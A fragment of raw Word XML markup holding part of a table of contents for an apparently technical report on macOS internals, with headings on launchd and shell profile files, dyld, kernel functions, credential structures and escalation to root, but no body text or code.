              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</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3" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>/etc/launchd.conf</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313223 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</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4" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>~/Library/LaunchAgents/local.launchd.conf.plist</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313224 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</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5" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>/etc/profile</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313225 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</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6" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.4.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>~/.profile</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313226 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</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27" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.5.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>~/.bashrc</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313227 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</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28" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Key mechanism</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313228 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2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29" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>execve()</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313229 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2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30" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>dyld</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313230 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2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31" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OSKext::unload</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313231 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</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32" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kernel`getsockopt</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313232 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</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33" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Runtime Structure</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313233 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</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34" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Thread</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313234 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</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35" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Get current thread</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313235 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4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36" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Esclation to root</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313236 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</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37" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Process</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313237 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</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38" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>proc</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313238 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</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39" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:noProof/>
              </w:rPr>
              <w:t>kauth_cred_t</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313239 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</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0" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>User stack</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313240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1" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.4.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
